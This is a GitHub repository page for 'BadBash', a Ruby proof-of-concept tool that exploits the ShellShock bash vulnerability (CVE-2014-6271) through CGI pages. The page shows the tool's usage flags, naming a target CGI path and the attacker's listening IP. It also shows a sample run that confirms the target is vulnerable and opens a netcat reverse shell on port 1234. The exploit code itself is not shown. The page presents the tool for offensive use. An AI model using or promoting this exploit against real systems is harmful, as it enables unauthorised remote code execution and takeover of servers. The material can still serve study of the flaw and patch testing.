CVE-2014-6271 (ShellShock) RCE PoC tool
Latest commit 573949b Sep 26, 2014 @RainMak3r RainMak3r Create BadBash.rb
Failed to load latest commit information.
BadBash.rb Create BadBash.rb Sep 26, 2014
LICENSE Initial commit Sep 26, 2014 Update Sep 26, 2014


CVE-2014-6271 (ShellShock) RCE PoC tool

BadBash is a CVE-2014-6271 RCE exploit tool. The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234.

Developer : Andy Yang Version : 0.1.0 License : GPLv3

Orginal github project :

RainMak3r@Could:~/Desktop# ruby BadBash.rb -h

BadBash - CVE-2014-6271 RCE tool by Andy Yang Basic version only checks for HTTP site Basic version only provides netcat reverse shell on port 1234


 ./BBash.rb  -t '' -d ''
 ./BBash.rb  -t '' -d ''
-t, --Target CGI path            Full path of CGI page
-d, --Destination IP             Your IP address that listen to an inbound connection
-h, --help                       Display help

Example of usage.

RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '' -d ''

[Info] Checking if the target is vulnerable........

[Info] This may take up to 10 seconds........

[Info] Target is vulnerable!!!

[Info] Please use NC to listen on port 1234 for reverse shell..........

[Info] Exploiting for a reverse shell to connect via netcat ..........